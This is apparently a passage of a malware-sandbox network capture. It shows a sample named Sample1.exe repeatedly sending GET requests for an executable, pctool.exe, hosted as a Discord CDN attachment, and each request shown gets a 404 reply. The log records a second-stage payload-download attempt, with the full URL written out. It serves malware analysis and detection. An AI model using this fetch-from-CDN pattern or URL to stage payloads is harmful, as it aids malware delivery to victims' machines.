2025-01-15 14:13:47 UTC	1047	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:13:47 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=jYbh0DhjCwKBP1.2YbKrZ5HIeNBrt8zEtd0hZgeoiDg-1736950427-1.0.1.1-voWwNknDNdnSpuv5HrYOm42e.IYAztjIE8MvhFQM_8uOaLi.HLY_gvrA_Q9l.TumcbJwIpFMk6vWoZb3brxFSA; path=/; expires=Wed, 15-Jan-25 14:43:47 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tWeRUDeaaxgXpTPNczYcRFbtZCzicHn9PJKkjMcCNsOpVyt1vlMli3wTB5gedM1L%2BQP6ioBoHaqbiF2d3ZLaA6nt7oyMB1Ag4uhRR6%2FLwg5KBjVRMwhZh%2FOiCTxmJX1hyVrjMw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=PVxzUNfkGGFmoszDK3Co.3JVonI.J_t1irJZbDulMaM-1736950427453-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902677eb8bd14380-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:13:47 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.25	49759	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:13:52 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:13:53 UTC	1053	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:13:53 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=PR1ncd85LR7bvw64qWwJAQ82.k.8T4yc8_NLL1wJl9k-1736950433-1.0.1.1-568Qmg4txlxlYLLIgA5BeHeWsePCTyf6.eRJ6Ry7822JABDIU72scyH9QLOkGDgtPi.b0tttUlVVE_7yyBkRTQ; path=/; expires=Wed, 15-Jan-25 14:43:53 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PCj%2Bb6H44TrRc6bSHFIlEB%2BqSJ9ESAlz%2FcnQS38mCZvyZJqK6dsz4UGvakO4xKAt8n0F%2B5dj69xKV2T6yCckTW0YNMrRoqqN9XxZ%2F9qK%2B23ujSyYt8liQzD8m30cGq5kovRzBQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=vp78_Z29A_hQegfxlSWsdPwYSNABPhu4qXcC2xmbm1E-1736950433109-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 9026780ecfed17ad-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:13:53 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.25	49760	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:13:58 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:13:58 UTC	1051	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:13:58 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=61uwAg9_iZQ1d2KW6Rh0mf0MD2xQICb4BE6kYPd4xtg-1736950438-1.0.1.1-bMHpg3FE1Hnrh.pnFppkbh48Nkoe9q3FsE8VGUw3I6HvpVCcFRwMp5lqwKQaiMxX9vEbjabfVWCXnFcGEq_MPg; path=/; expires=Wed, 15-Jan-25 14:43:58 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xj7wmGIWY5MTWxFBBCdCorJDwHgOzlq8rjfuWtZUC87PLFjm%2F%2BX3otBKvlCZv%2BSrztB1%2B1GordgBlMFcJ7xUeXKm5dQRrgpC10Xv82D380%2B2dx6b5nejYy2sJOp9P9RHIY0wOA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=JhuDanFC2evAqrF10mG8pXCG61AVrVZs1HJOZZPBpF0-1736950438748-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902678320973c343-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:13:58 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.25	49761	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:14:04 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:14:04 UTC	1055	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:14:04 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=8SEsWEEPngeDi.8dQZkzPWUyZtAX3kHPeaPrDp_I9CI-1736950444-1.0.1.1-3ODahXziwWni.2jLrewOH0iMQnZ53s9y.QfyKDkrXtf59quwJq_tVQlxF0l9oQwQq820dojZpUqSkYTC50MBMA; path=/; expires=Wed, 15-Jan-25 14:44:04 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z4GHNrXUYKS%2BuEzIyRu8%2BxCeJNtzV8fL1xFBqnJL1EjahPrthJXcah4iPZdFJB%2FLJ%2F%2BFJD7siNvSFTzH%2BVGUM5kp9j7r7vSY%2BCrTH7giJWxln5bFmWZZTThzE74s8Q6zx6pOnQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=_VR18RE1wWryPwLEiKVxcHZ.vbIZ96a9JOWkh..p_Gg-1736950444360-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267855282f422e-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:14:04 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.25	49764	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:14:09 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:14:10 UTC	1047	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:14:09 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=yDAG_3avNVVJnpdBkXKWcZgRW4oBa0R72usFkQVmQ44-1736950449-1.0.1.1-bSbiHWAvwf7G7JuPqGVnNMzVVdvXCJTcYmrNjpNrbw7bBxpB7__RYvPi1Q0hcPhuGxi2dPlW4yZ5ZcIdGuqP8Q; path=/; expires=Wed, 15-Jan-25 14:44:09 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jaYe7D78YQRM69%2BmScR8fwL7d0tf1hkjiXqTljpan9%2FNJDYd7W6TBsQJwnMivvSwMc%2B2kG8VGnxGoAdkQXqJqq3l9YjD4zaTBAHntOQ2PHX1bnq4uEMJaahHGHuiAuPSDPYpcA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=wTIvUpx6cAahjmnvGJSAswzYJpvYSNc5s49o2NtSaYY-1736950449972-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902678783883c475-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:14:10 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.25	49765	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:14:15 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:14:15 UTC	1045	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:14:15 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=e9QxghO3PrfU_hUiqBrGgML594FTvJKsItaOZb28aP4-1736950455-1.0.1.1-sabzhXOceyUcnH9k5sZQu1hcmOvvNQQCo1CLMlJrWDirFh_xjUVfOAKgGx.gmkNA6edJITPXiOJ1QVRg.h7QeA; path=/; expires=Wed, 15-Jan-25 14:44:15 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PlgHLA2IXMZdvZtz6HiYbbJiyVCMjFeO8O4KHQ6dSb6Nm84airr4%2B7vetaGM0FX0eiITDdGCIJWqpMdQmf1M2zWnH%2FtaGlsZ7SUCBOB8SMVRWRtHJBVFVEHVJALdlkeybitutg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=gw7y6PAzpr1.Yrl.asPdToojGgQahd9lfjrm4ImKeRk-1736950455651-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 9026789b98d915a3-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:14:15 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.25	49766	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:14:21 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:14:21 UTC	1047	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:14:21 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=thfy1YcVaG218OgTdIBtYAxplZ7Y1DBmEfX1dWh4cro-1736950461-1.0.1.1-_lQOfIveQcIvANK8Jt5UQOGlwTYBjOYlG2xsSYHVrNMCZ3qFdM7fzbRM4NHOFXFkJxYNOmzAMAVWwnd6IiG8WQ; path=/; expires=Wed, 15-Jan-25 14:44:21 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sdl06Y%2FDWE0UUJE6S9zDSnA0UEtOA1eK%2FQ9A14QaJ84SXGj3dRm0o0gpWcg9Oin9iClzo54Lup7nDrtM8EhnOOnq0HrSVLKYbdlmvB4H%2FxgZnYyBC7VB9YRyKpZwSwexsbSmxA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=afonBfcQ6SlQB9pWe7ov27ip6CDvRADiPVgXhj147Ac-1736950461295-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902678beee991881-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:14:21 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.25	49768	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:14:26 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:14:26 UTC	1049	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:14:26 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=ec7eMl3fUDW_etYeRV8RVR6PtYCDuzm59I7HpswS._M-1736950466-1.0.1.1-kPNlxmcSpe0sYDU.dmxOQr2r6r23gFCbXnwHkJ1W5SS8VukGUhXf19Z9M6j7T_bupdAtF2AttsnfWNxjYVHTgw; path=/; expires=Wed, 15-Jan-25 14:44:26 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sbJirnRfNiAqyOwUwejSPDmrXCOXmVGWoZBjeOgwNvTQO26Hgc2hxaGFPrwIXxWbbnyoBjvR%2FLrKDlvj1b3one8C9DqsvdBA%2BE%2BQ3ZF0WD2Rlv07jrDrJ0b%2F7lv6T621Fe6r9Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=FTWb.gaznAHm_yjaqXirKnJjK7cR9s7JML.yiCK3qbw-1736950466922-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902678e21c0e2394-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:14:26 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.25	49771	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:14:32 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:14:32 UTC	1049	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:14:32 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=_6xMb.N372P1_Ofd_N0qmjkTewkYSXY_DBiIwshfu94-1736950472-1.0.1.1-aC4rcOrXzo61jJJ6QJsuSvN_YbO0iX.wrC.v4fZ76P55qt1hb4QwV2sXWQ7R92q4BZDB4OzQ5dLsNtZ0s.gdFQ; path=/; expires=Wed, 15-Jan-25 14:44:32 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=txElbe0oAzUP0%2FD%2BX6RpXnadAt%2Fyi1mp9d6NYEFFggDkwGOR3ZL1UZsJjIVzn0AkXuAoAg4CiNw9DxqVWlbLvk4ySQMLw7QK%2F4DEsMEVj0SmaL3CGGVJvs3ps2oNfKMIDQlm0g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=tK0NS4De8aqkdk.seFrU2N7zJ_2hBVRb81nmciK8fqw-1736950472567-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902679053f867c6c-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:14:32 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.25	49773	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:14:38 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:14:38 UTC	1053	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:14:38 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=TqhqwJQvyCWMtCuOYuGhhexaLNMyQ4jlMaGv25FFhXA-1736950478-1.0.1.1-XwuhKLPi5IPt.nz82RzYuOLGoFzLzMJce1zdLr5lzbz4lW_bgCTIR9AxQRQr0WJzYRy2sVUnG4B0FZ6QMPO03Q; path=/; expires=Wed, 15-Jan-25 14:44:38 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bhx6B5V7hefcVU8SJWavgxT099fII%2BAu5ztWSfBCvn9iT8IJNJ7eL%2F4NOwS7p%2Fd5jWC0257kFTt1Og54PDriowXPc3YjN46nTW4SoMGbIUpZB5aIjo3wpiaP5CG%2Be0ZU2j%2FIDg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=.29J3v_2m03ba.3M656HA09EJL5ng111XqlVNVfRhhU-1736950478214-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267928b89c41ed-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:14:38 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.25	49774	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:14:43 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:14:43 UTC	1051	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:14:43 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=h4lJuUSj2rMu7o8Kd058TqW8JZnFlCM6qVMhwKJCJfI-1736950483-1.0.1.1-fx8KsgblWMS.UESsJqyk5ksOdXCpm6s8GwxJGPLRTbQnKq_fxAw37Mtgkqbs9uWTh6XiY5dDEPccrAA4zMz5.g; path=/; expires=Wed, 15-Jan-25 14:44:43 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h7QyO5dz%2FMgPRTYTiry1RAARz2o38X431fyzgmaT0SOcQIndZ%2BcaQ6%2B8CyM8QifdEl2o6ZWORKdPMBUEEyInpGuZgfxkjmkgTIh%2BAIgusdRssoP6PDMC4TPYlFJ6eM%2FvnhZFZw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=CG28CHavwXdgsqGf9b9kwdcom8xnyZHCf_yURhy2Eic-1736950483819-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 9026794bcd26c42c-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:14:43 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.25	49776	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:14:49 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:14:49 UTC	1051	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:14:49 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=WwYznyii0sCSR1HrD7ctQs4oppCDR.7tRvny8oBEyfo-1736950489-1.0.1.1-6l.GWZJspKMG9BQatmR63PuvYXQkpU_uBMCH8zDZKkyuk3dg3XwuxsmuaxezgKkArG6HZe_dvR_UhBEDi.qo0w; path=/; expires=Wed, 15-Jan-25 14:44:49 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8rriir5Gg4I0BC51wws4k19yS2FHWe1m05d9xx2BCTIhUif5wBByqYQqy%2BJVi36x%2BQyTuPnThj%2F4d0RHLEiM2wGtJxtolXjvWq3FZ7s1hySCkosSKitn%2BzmONJMAtGHqYX%2BmHg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=Eu84zhqoWHW8QXS8v0z5WyUfXb.2b85ORyWTK_WRo7w-1736950489428-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 9026796eddd742b3-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:14:49 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.25	49778	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:14:54 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:14:55 UTC	1045	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:14:55 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=PbQ3H495Sjneip6r5LOlvs3fcJopHYwZag.QHa51Zds-1736950495-1.0.1.1-m2MpxvHTLAIsQ3FB4z5X6vS_2Kx_Nwr2Zp6pSLU8m2EUUKw4Pw_QbBbfSo_0alaE4jxURvmyAgj40jB1pIXTZQ; path=/; expires=Wed, 15-Jan-25 14:44:55 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BeJeYb%2BFvH3NS8jJeAqc2Ex%2FqHyX9VrhEcdDqWnkr1ugLpaXcexvUktrUoTFrnG1vn4SNXjD0z80j74HrO90AWCiSuNtWm1PQqmOF0rF57CJqVF4hbQIFZCAW53nhrIQixenzg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=AIQBQAkZHhzsoVL34WvpUkXevk8d_LYVAt9eUbQmHyE-1736950495049-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267991fff38ccc-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:14:55 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.25	49782	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:15:00 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:15:00 UTC	1049	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:15:00 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=g4TYPrmcdQJQJ7gF_DEB9OXmwsCZI5j.1QrKmjzK6CI-1736950500-1.0.1.1-toBSNVx4UcByrGB7VrhomEF_sEKEYR4wmhLMcWznIZ0UlBNvQP6FU4F.fl_uci_PYZh7V14bUQ4_0oGAuytPAw; path=/; expires=Wed, 15-Jan-25 14:45:00 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=neLcJr%2FWWAvZ4YxEUHcMBH00mZdc466jGunKh5vQpTeyoLElZDq0LowpGGw6tgvPZWKv6HFVnK5lmc24t4%2Bxh5BQ%2BVH6LZxw6%2BJRXBp9WZKGPV0ATNKtHYjzTa7BulY4SWJotw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=yAvlV8SYe_spXDF6FywwbPmWuDH457jwPHl6M7f1lHQ-1736950500659-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902679b50aee7c8a-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:15:00 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.25	49783	162.159.129.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:15:06 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
